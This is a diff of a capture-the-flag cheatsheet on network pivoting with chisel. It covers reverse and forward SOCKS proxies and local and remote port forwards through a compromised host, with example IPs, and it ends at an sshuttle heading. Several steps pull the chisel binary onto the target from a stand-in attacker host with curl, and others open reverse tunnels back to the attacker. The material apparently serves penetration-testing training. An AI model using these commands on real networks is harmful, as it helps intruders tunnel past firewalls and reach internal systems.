c0nd0r3agl3/cheatsheets/ctf-cheatsheet.md

 2. ./chisel server -p 1338 --reverse
 3. ./chisel client ATTACKER_IP:1338 R:socks

-1. (on target)
+Line 1. (on target)
-2. (as attacker)  start chisel in server mode on our Kali host, and listening on a port that is open for outbound connections in the target firewall
+Line 2. (as attacker)  start chisel in server mode on our Kali host, and listening on a port that is open for outbound connections in the target firewall
-3. (on target)    despite connecting back to port 1337, the actual proxy has been opened on 127.0.0.1:1080.
+Line 3. (on target)    despite connecting back to port 1337, the actual proxy has been opened on 127.0.0.1:1080.
 We will be using port 1080 when sending data through the proxy

 # forward SOCKS proxy with chisel on linux target for bind shells ( must setup socks5 proxy in proxychains on port 1080)
 1. curl http://ATTACKER/chisel -o chisel && chmod +x chisel
 2. /chisel server -p LISTEN_PORT --socks5
 3. ./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

-1. (on target)
+Line 1. (on target)
-2. (on target)
+Line 2. (on target)
-3. (as attacker)  In this command, PROXY_PORT is the port that will be opened for the proxy.
+Line 3. (as attacker)  In this command, PROXY_PORT is the port that will be opened for the proxy.
 For example, ./chisel client 172.16.0.10:8080 1337:socks would connect to a chisel server running on port 8080 of 172.16.0.10.
 A SOCKS proxy would be opened on port 1337 of our attacking machine.

 # Local Port Forward with chisel
 1. curl http://ATTACKER/chisel -o chisel && chmod +x chisel
 2. ./chisel server -p LISTEN_PORT
 3. ./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT

-1. (on target)
+Line 1. (on target)
-2. (as attacker)
+Line 2. (as attacker)
-3. (on target)  As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.
+Line 3. (on target)  As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.
 For example, to connect to 172.16.0.5:8000 (the compromised host running a chisel server), forwarding our local port 2222 to  access  172.16.0.10:22 (our intended target on port 22), we could use: ./chisel client 172.16.0.5:8000 2222:172.16.0.10:22

 # remote Port Forward with chisel
 1. curl http://ATTACKER/chisel -o chisel && chmod +x chisel
 2. ./chisel server -p LISTEN_PORT --reverse
 3. ./chisel client ATTACKING_IP:LISTEN_PORT R:OUR_LOCAL_PORT:TARGET_IP:TARGET_PORT

-1. (on target)
+Line 1. (on target)
-2. (as attacker)
+Line 2. (as attacker)
-3. (on target)  You may recognise this as being very similar to the SSH reverse port forward method, where we specify the local port to open, the target IP, and the  target port, separated by colons.
+Line 3. (on target)  You may recognise this as being very similar to the SSH reverse port forward method, where we specify the local port to open, the target IP, and the  target port, separated by colons.
 Note the distinction between the LISTEN_PORT and the LOCAL_PORT.
 Here the LISTEN_PORT is the port that we started the chisel server on, and the LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.
 To use an old example, let's assume that our own IP is 172.16.0.20, the compromised server's IP is 172.16.0.5, and our target is port 22 on 172.16.0.10.
 The syntax for forwarding 172.16.0.10:22 back to port 2222 on our attacking machine would be as follows: ./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22.
 Connecting back to our attacking machine, functioning as a chisel server started with: ./chisel server -p 1337 --reverse.
 This would allow us to access 172.16.0.10:22 (via SSH) by navigating to 127.0.0.1:2222 on our attacker machine.

 ## sshuttle